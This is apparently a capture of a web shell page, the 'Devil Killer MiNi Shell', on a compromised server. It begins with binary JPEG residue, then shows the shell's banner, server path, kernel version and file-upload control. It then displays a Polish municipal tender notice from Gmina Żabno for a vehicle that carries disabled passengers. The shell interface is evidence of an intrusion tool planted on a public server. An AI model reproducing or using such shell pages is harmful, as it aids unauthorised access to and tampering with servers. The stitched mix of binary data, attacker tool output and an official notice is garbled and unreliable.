JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220906/0033530701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa 9-cio osobowego samochodu do przewozu osób niepełnosprawnych w ramach projektu pn. „Likwidacja barier transportowych w Gminie Żabno&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Żabno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000529137</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ul. Władysława Jagiełły 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żabno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@zabno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zabno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa 9-cio osobowego samochodu do przewozu osób niepełnosprawnych w ramach projektu pn. „Likwidacja barier transportowych w Gminie Żabno&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af0c6b12-2dcf-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00335307</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00060177/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa 9-cio osobowego samochodu osobowego przystosowanego do przewozu osób niepełnosprawnych w tym z jednym miejscem przystosowanym do przewozu osoby na wózku inwalidzkim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/umwzabno,m,402331,2022.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal, dzp@zabno.pl,<br/>tgdowski@zabno.pl, amosio@zabno.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>– miniPortalu, który dostępny jest pod adresem https://miniportal.uzp.gov.pl/,<br/>– ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal<br/>– poczty elektronicznej dzp@zabno.pl .<br/>2) Zamawiający przewiduje również komunikację pomiędzy Zamawiającym a Wykonawca za pomocą poczty elektronicznej:<br/>a) w sprawach dotyczących przedmiotu zamówienia – Andrzej Bartik, Urząd Miejski w Żabnie, ul. Jagiełły 1, 33-240 Żabno, w godz.<br/>730 – 1300, tel. +48/14 645 60 12, wew. 24, e-mail: abartik@zabno.pl<br/>b) w sprawach proceduralnych – Tomasz Gdowski i Arkadiusz Mosio Urząd Miejski<br/>w Żabnie, ul. Jagiełły 1, 33-240 Żabno, w godz. 730 – 1300, tel. +48/14 645 60 12, wew. 31, e-mail: tgdowski@zabno.pl,<br/>amosio@zabno.pl<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7) Zamawiający przekazuje Identyfikator postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać<br/>również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.<br/>8) Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej lub podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf,<br/>.pdf, .doc, .docx, .odt..<br/>9) Wykonawcy w korespondencji kierowanej do Zamawiającego powinni posługiwać się numerem przedmiotowego postępowania<br/>(znakiem sprawy).<br/>W zakresie nie wymienionym powyżej zastosowanie mają zapisy SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego pn. „Dostawa 9-cio osobowego samochodu do przewozu osób<br/>niepełnosprawnych w ramach projektu pn. „Likwidacja barier transportowych w Gminie Żabno”.<br/>3) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacja postępowania zgodnie z art. 8, art. 18, art. 74, oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001<br/>r. o dostępie do informacji publicznej.<br/>4) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>5) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 6 do SWZ.<br/>6) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli<br/>administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz<br/>udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>7) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków<br/>formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>– obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których<br/>dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego;<br/>– obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób<br/>pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego.<br/>8) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby<br/>trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu<br/>przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>załączniku nr 6 do SWZ.<br/>Sposób i zasady udostępniania danych osobowych określają zapisy SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.35.3.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Zamówienie obejmuje dostawę 9-cio osobowego samochodu przystosowanego do przewozu osób niepełnosprawnych, w tym z jednym miejscem przystosowanym do przewozu osoby na wózku inwalidzkim w ramach projektu pn. „Likwidacja barier transportowych w Gminie Żabno” realizowanego przez Gminę Żabno w ramach dofinansowania otrzymanego z „Programu wyrównywania różnic między regionami III” realizowanego przez PFRON.<br/>2) Szczegółowy opis i zakres Przedmiotu zamówienia określają:<br/>􀀀 Opis parametrów pojazdu – Załącznik nr 4.1, do SWZ,<br/>􀀀 Projektowane postanowienia umowy – Załącznik nr 4.2 do SWZ.<br/>3) Pojazd musi posiadać homologację jako 9-osobowy (kierowca +8 pasażerów) oraz musi być dopuszczony do ruchu<br/>zgodnie z ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym.<br/>4) Wykonawca zobowiązuje się do dostarczenia Zamawiającemu fabrycznie nowego samochodu osobowego wraz z<br/>wyposażeniem, zwanym w niniejszej SWZ „samochodem lub pojazdem” spełniającego wymagania określone w Specyfikacji<br/>Warunków Zamówienia, załącznikach do niej (w szczególności w Opisie parametrów pojazdu) oraz Projektowanych<br/>postanowieniach umownych.<br/>5) Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia do siedziby Zamawiającego na adres: Urząd Miejski w<br/>Żabnie , ul. Jagiełły 1, 33-240 Żabno.<br/>6) Dostarczany pojazd:<br/>a) musi być fabrycznie nowy, wyprodukowany w 2022 roku, kompletny, wolny od wad konstrukcyjnych, materiałowych i<br/>wykonawczych, gotowy do rejestracji<br/>i użytkowania w celu wynikającym z warunków zamówienia,<br/>b) nie może być ograniczony prawami osób trzecich,<br/>c) nie może być przedmiotem jakiegokolwiek postępowania i zabezpieczenia (wykonawcy przysługuje pełne prawo do<br/>dysponowania),<br/>d) musi być zgodny z przepisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym oraz aktami wykonawczymi do<br/>tej ustawy, jak również innymi przepisami obowiązującego prawa krajowego oraz prawa unijnego,<br/>e) musi posiadać homologację<br/>7) Z chwilą wydania pojazdu, przechodzi jego własność na Zamawiającego.<br/>8) Wraz pojazdem Wykonawca dostarczy:<br/>a) oryginalną instrukcję obsługi w języku polskim,<br/>b) książkę gwarancyjną wraz ze szczegółowymi warunkami gwarancji i serwisu,<br/>c) książkę przeglądów serwisowych,<br/>d) dokumenty niezbędne do rejestracji pojazdu,<br/>e) fakturę VAT,<br/>f) świadectwo zgodności WE,<br/>g) dokument potwierdzający posiadanie akcyzy dopuszcza się oświadczenie sprzedawcy,<br/>h) kartę pojazdu,<br/>i) inne dokumenty konieczne do zarejestrowania i użytkowania samochodu.<br/>9) Zamawiający oczekuje od Wykonawcy podania ceny za realizację przedmiotu zamówienia, na którą składa ofertę jako<br/>ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów zamówienia zgodnie z opisem zawartym w załącznikach<br/>szczegółowo opisujących daną część przedmiotu zamówienia.<br/>Uwagi końcowe:<br/>– Wykonawca wykona powierzone zamówienie w oparciu o opisujące przedmiot zamówienia, dokumenty zamówienia, z<br/>należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami technicznymi, standardami,<br/>– Wszystkie używane do realizacji przedmiotu zamówienia materiały musza posiadać wymagane atesty i certyfikaty,<br/>– Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami zamówienia,<br/>– Jeżeli dokumenty zamówienia wskazywałyby w odniesieniu do jakichkolwiek materiałów lub urządzeń znaki towarowe,<br/>patenty lub pochodzenie, Zamawiający dopuszcza zaoferowanie materiałów lub urządzeń równoważnych o parametrach nie<br/>gorszych od opisanych w dokumentach zamówienia, które traktować należy jako minimalne. W związku z powyższym<br/>materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy<br/>użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez Wykonawcę, aby zostały spełnione<br/>wymagania stawiane przez Zamawiającego. Takie parametry uznane będą za kryteria stosowane w celu oceny<br/>równoważności, zgodnie z art. 99 ust. 6 ustawy Pzp. Materiały lub urządzenia pochodzące od konkretnych producentów<br/>stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod pojęciem „minimalne parametry jakościowe i cechy<br/>użytkowe” Zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach,<br/>katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu<br/>doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami<br/>producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta<br/>(dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o<br/>parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym<br/>samym każdy produkt o wskazanych lub lepszych parametrach. W takiej sytuacji Zamawiający wymaga złożenia<br/>stosownych dokumentów, uwiarygodniających te materiały lub urządzenia..<br/>3) Wszystkie wymagania określone w dokumentach wskazanych w ust.1, pkt. 2) powyżej stanowią wymagania minimalne, a<br/>ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako<br/>niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34100000-8 - Pojazdy silnikowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34110000-1 - Samochody osobowe</p> <p class="mb-0">34115200-8 - Pojazdy silnikowe do transportu mniej niż 10 osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Przy wyborze najkorzystniejszej oferty, zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp. Opis kryterium oceny Znaczenie (pkt)<br/>1. Cena (Pc) 60 punktów<br/>2. Parametry techniczne (Pt) 20 punktów<br/>3. Okres gwarancji mechanicznej (Pg) 20 punktów<br/>Razem 100 punktów<br/><br/>1.1) Sposób dokonywania oceny:<br/>a) Sposób oceny ofert w kryterium cena (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc – liczba punktów<br/>Cbn – najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb – proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b) Sposób oceny ofert w kryterium Parametry techniczne (Pt):<br/><br/> zaoferowanie pojazdu z klimatyzacją elektroniczną zarówno w części przeznaczonej dla kierowcy jak też w części pasażerskiej (od drugiego rzędu siedzeń) - 20 pkt.,<br/> zaoferowanie pojazdu z klimatyzacją elektroniczną tylko w części przeznaczonej dla kierowcy (w części pasażerskiej, tj. od drugiego rzędu siedzeń - klimatyzacja manualna) -10 pkt.,<br/> zaoferowanie wyłącznie klimatyzacji manualnej zarówno w części przeznaczonej dla kierowcy jak i w części pasażerskiej, tj. od drugiego rzędu siedzeń - 0 pkt.<br/><br/>c) Sposób oceny ofert w kryterium okres gwarancji mechanicznej dla całego pojazdu , (Pg)<br/>• Zaoferowanie 24 miesięcy gwarancji – 0 pkt.<br/>• Zaoferowanie 36 miesięcy gwarancji – 10 pkt.<br/>• Zaoferowanie 48 miesięcy gwarancji – 20 pkt.<br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 48 miesięcy. Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące<br/><br/>d) Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pt + Pg,<br/><br/>Gdzie: Lp – całkowita liczba punktów uzyskanych przez ofertę<br/>Pc – liczba punktów uzyskanych w kryterium cena<br/>Pt – liczba punktów uzyskanych w kryterium parametry techniczne<br/>Pg – liczba punktów uzyskanych w kryterium okres gwarancji jakości<br/><br/>2) Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>3) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji mechanicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, zamawiający przed 